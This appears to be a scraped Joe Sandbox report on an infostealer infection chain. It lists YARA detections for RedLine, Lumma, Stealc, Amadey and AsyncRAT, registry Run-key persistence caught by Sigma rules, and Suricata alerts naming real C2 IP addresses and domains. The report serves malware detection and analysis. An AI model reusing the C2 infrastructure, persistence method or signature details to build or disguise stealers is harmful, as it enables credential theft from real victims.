Process Memory Space: crypted.exe PID: 2956	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 6472	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 6472	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 62 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
37.2.InstallUtil.exe.800000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
37.2.InstallUtil.exe.800000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8975:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8a12:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8b27:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8507:$cnc4: POST / HTTP/1.1
7.2.gold.exe.37a5570.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
19.0.stealc_default2.exe.f50000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
22.2.needmoney.exe.30ea4b9.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
31.2.RegAsm.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
9.2.RegAsm.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
22.2.needmoney.exe.3740000.2.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
15.0.hjhTHr6fWy.exe.980000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
22.2.needmoney.exe.3710000.1.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
7.2.gold.exe.37a5570.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
2.2.axplong.exe.6d0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
16.0.Nework.exe.190000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
24.0.penis.exe.ca0000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
24.0.penis.exe.ca0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
24.0.penis.exe.ca0000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x58801:$s1: file:/// 0x58739:$s2: {11111-22222-10009-11112} 0x58791:$s3: {11111-22222-50001-00000} 0x54fb8:$s4: get_Module 0x4ec48:$s5: Reverse 0x4fa7a:$s6: BlockCopy 0x4eb63:$s7: ReadByte 0x58813:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
13.2.RegAsm.exe.436080.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
13.2.RegAsm.exe.436080.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
18.0.Hkbsse.exe.210000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
17.2.Hkbsse.exe.210000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
17.0.Hkbsse.exe.210000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
22.2.needmoney.exe.3710000.1.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
27.2.crypted.exe.39e5570.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
22.2.needmoney.exe.30ea4b9.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.file.exe.d70000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
35.0.newbundle2.exe.c20000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
16.2.Nework.exe.190000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
22.2.needmoney.exe.3740000.2.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
13.2.RegAsm.exe.400000.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
18.2.Hkbsse.exe.210000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
36.2.rstxdhuj.exe.6610000.6.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
19.2.stealc_default2.exe.f50000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
13.2.RegAsm.exe.400000.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
36.2.rstxdhuj.exe.4141590.4.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
36.2.rstxdhuj.exe.4141590.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
36.2.rstxdhuj.exe.4141590.4.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x147db5:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x147e52:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x147f67:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x147947:$cnc4: POST / HTTP/1.1
36.2.rstxdhuj.exe.418fdb0.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
36.2.rstxdhuj.exe.418fdb0.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xf9595:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xf9632:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xf9747:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xf9127:$cnc4: POST / HTTP/1.1
3.2.axplong.exe.6d0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
32.0.svchost015.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
32.0.svchost015.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 36 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1000354001\c9a37ab27e.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ProcessId: 5632, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c9a37ab27e.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1000354001\c9a37ab27e.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ProcessId: 5632, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c9a37ab27e.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3372, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:40.834724+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49761	172.67.162.108	443	TCP
2024-09-27T04:21:41.799990+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49764	104.21.4.136	443	TCP
2024-09-27T04:21:42.768513+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49768	188.114.97.3	443	TCP
2024-09-27T04:21:43.796860+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49770	188.114.96.3	443	TCP
2024-09-27T04:21:44.935333+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49772	188.114.96.3	443	TCP
2024-09-27T04:21:45.910489+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49775	172.67.162.108	443	TCP
2024-09-27T04:21:47.001883+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49777	188.114.97.3	443	TCP
2024-09-27T04:21:47.966310+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49779	188.114.96.3	443	TCP
2024-09-27T04:21:48.954207+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49780	172.67.208.139	443	TCP
2024-09-27T04:21:51.541031+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49786	104.21.2.13	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:40.834724+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49761	172.67.162.108	443	TCP
2024-09-27T04:21:41.799990+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49764	104.21.4.136	443	TCP
2024-09-27T04:21:42.768513+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49768	188.114.97.3	443	TCP
2024-09-27T04:21:43.796860+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49770	188.114.96.3	443	TCP
2024-09-27T04:21:44.935333+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49772	188.114.96.3	443	TCP
2024-09-27T04:21:45.910489+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49775	172.67.162.108	443	TCP
2024-09-27T04:21:47.001883+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49777	188.114.97.3	443	TCP
2024-09-27T04:21:47.966310+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49779	188.114.96.3	443	TCP
2024-09-27T04:21:48.954207+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49780	172.67.208.139	443	TCP
2024-09-27T04:21:51.541031+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49786	104.21.2.13	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:40.067143+0200	2056157	1	Domain Observed Used for C2 Detected	192.168.2.5	49761	172.67.162.108	443	TCP
2024-09-27T04:21:45.410461+0200	2056157	1	Domain Observed Used for C2 Detected	192.168.2.5	49775	172.67.162.108	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:46.529810+0200	2056155	1	Domain Observed Used for C2 Detected	192.168.2.5	49777	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:42.286462+0200	2056163	1	Domain Observed Used for C2 Detected	192.168.2.5	49768	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:41.358465+0200	2056165	1	Domain Observed Used for C2 Detected	192.168.2.5	49764	104.21.4.136	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:43.341734+0200	2056161	1	Domain Observed Used for C2 Detected	192.168.2.5	49770	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:48.506040+0200	2056151	1	Domain Observed Used for C2 Detected	192.168.2.5	49780	172.67.208.139	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:47.497422+0200	2056153	1	Domain Observed Used for C2 Detected	192.168.2.5	49779	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:44.366238+0200	2056159	1	Domain Observed Used for C2 Detected	192.168.2.5	49772	188.114.96.3	443	TCP

ET MALWARE Redline Stealer TCP CnC - Id1Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:08.333467+0200	2043234	1	A Network Trojan was detected	95.179.250.45	26212	192.168.2.5	49714	TCP
2024-09-27T04:21:12.438294+0200	2043234	1	A Network Trojan was detected	65.21.18.51	45580	192.168.2.5	49719	TCP
2024-09-27T04:21:12.583748+0200	2043234	1	A Network Trojan was detected	65.21.18.51	45580	192.168.2.5	49719	TCP
2024-09-27T04:21:29.526562+0200	2043234	1	A Network Trojan was detected	89.105.223.196	29862	192.168.2.5	49743	TCP
2024-09-27T04:21:29.739621+0200	2043234	1	A Network Trojan was detected	89.105.223.196	29862	192.168.2.5	49743	TCP
2024-09-27T04:21:33.068659+0200	2043234	1	A Network Trojan was detected	185.215.113.67	15206	192.168.2.5	49750	TCP

ET MALWARE Redline Stealer TCP CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:08.140028+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:12.148645+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:13.398377+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:13.817728+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:14.176245+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:14.482192+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:14.682022+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:14.973067+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:15.170311+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:15.369248+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:15.616618+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:15.856746+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:16.052602+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:16.332605+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:16.661175+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:16.780172+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:16.977314+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:17.186234+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:17.494773+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:17.508217+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:17.843765+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:18.060072+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:18.772116+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:19.178330+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:19.183486+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:20.219293+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:20.611307+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:20.813244+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:20.908544+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:21.017152+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:21.102882+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:21.296039+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:21.567423+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49714	95.179.250.45	26212	TCP
2024-09-27T04:21:21.576698+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:21.782648+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:22.097536+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:22.313225+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:22.534709+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:22.736067+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:23.364228+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:23.568877+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:24.078791+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:24.391440+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:25.937055+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:26.137919+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:26.338483+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:26.650781+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49719	65.21.18.51	45580	TCP
2024-09-27T04:21:29.352246+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:32.851910+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:34.572744+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:35.394851+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:35.574292+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:35.798129+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:35.976244+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:36.426655+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:36.732332+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:36.906933+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:37.079702+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:38.121784+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:38.733929+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:38.740303+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:39.303670+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:39.477939+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:39.595188+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:39.800528+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:39.805609+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:39.891955+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:41.024523+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:41.985937+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:42.263346+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:42.468552+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:42.605262+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:42.650790+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:42.826859+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:42.834216+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:43.041333+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:43.116994+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:43.214866+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:43.442435+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:43.994728+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:44.092300+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:44.167289+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:44.339968+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:44.485367+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:44.650067+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:44.711706+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:45.150099+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:45.367800+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:46.452161+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:46.672609+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:46.892502+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:47.203326+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:47.422258+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:47.718337+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:47.936019+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:48.389197+0200	2043231	1	A Network Trojan was detected	192.168.2.5	49750	185.215.113.67	15206	TCP

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:13.595211+0200	2046056	1	A Network Trojan was detected	95.179.250.45	26212	192.168.2.5	49714	TCP
2024-09-27T04:21:17.848571+0200	2046056	1	A Network Trojan was detected	65.21.18.51	45580	192.168.2.5	49719	TCP
2024-09-27T04:21:35.399703+0200	2046056	1	A Network Trojan was detected	89.105.223.196	29862	192.168.2.5	49743	TCP
2024-09-27T04:21:38.430892+0200	2046056	1	A Network Trojan was detected	185.215.113.67	15206	192.168.2.5	49750	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T04:21:06.076576+0200	2044696	1	A Network Trojan was detected	192.168.2.5	49712	185.215.113.16	80	TCP
2024-09-27T04:21:08.998809+0200	2044696	1	A Network Trojan was detected	192.168.2.5	49715	185.215.113.16	80	TCP
2024-09-27T04:21:12.438395+0200	2044696	1	A Network Trojan was detected	192.168.2.5	49720	185.215.113.16	80	TCP
2024-09-27T04:21:14.491667+0200	2044696	1	A Network Trojan was detected	192.168.2.5	49723	185.215.113.16	80	TCP
2024-09-27T04:21:20.850558+0200	2044696	1	A Network Trojan was detected	192.168.2.5	49728	185.215.113.16	80	TCP
2024-09-27T04:21:23.491147+0200	2044696	1	A Network Trojan was detected	192.168.2.5	49731	185.215.113.16	80	TCP
2024-09-27T04:21:26.566308+0200	2044696	1	A Network Trojan was detected	192.168.2.5	49738	185.215.113.16	80	TCP
2024-09-27T04:21:29.465052+0200	2044696	1	A Network Trojan was detected	192.168.2.5	49744	185.215.113.16	80	TCP
2024-09-27T04:21:32.022330+0200	2044696	1	A Network Trojan was detected	192.168.2.5	49749	185.215.113.16	80	TCP
2024-09-27T04:21:34.673992+0200	2044696	1	A Network Trojan was detected	192.168.2.5	49753	185.215.113.16	80	TCP
2024-09-27T04:21:36.986236+0200	2044696	1	A Network Trojan was detected	192.168.2.5	49757	185.215.113.16	80	TCP
2024-09-27T04:21:41.327037+0200	2044696	1	A Network Trojan was detected	192.168.2.5	49763	185.215.113.16	80	TCP
2024-09-27T04:21:45.407138+0200	2044696	1	A Network Trojan was detected	192.168.2.5	49774	185.215.113.16	80	TCP
